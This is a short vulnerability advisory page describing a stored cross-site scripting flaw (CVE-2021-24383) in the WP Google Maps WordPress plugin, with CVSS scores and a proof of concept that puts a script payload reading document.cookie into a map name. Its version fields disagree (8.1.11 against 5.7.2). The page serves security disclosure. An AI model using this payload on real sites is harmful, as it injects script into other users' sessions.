WordPress WP Google Maps 8.1.11 Cross Site Scripting

2021.06.25
Credit: Mohammed Adam
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS) # Date: 22/6/2021 # Exploit Author: Mohammed Adam # Vendor Homepage: https://www.wpgmaps.com/ # Software Link: https://wordpress.org/plugins/wp-google-maps/ # Version: 5.7.2 # Tested on: Windows 10 # CVE: CVE-2021-24383 # References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954 *Proof of Concept* *Steps to Reproduce:* 1) Edit a map (e.g /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1) 2) Change Map Name to <script>alert(document.cookie)</script> 3) Save the Map 4) Stored XSS will be triggered when viewing the Map List (/wp-admin/admin.php?page=wp-google-maps-menu)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top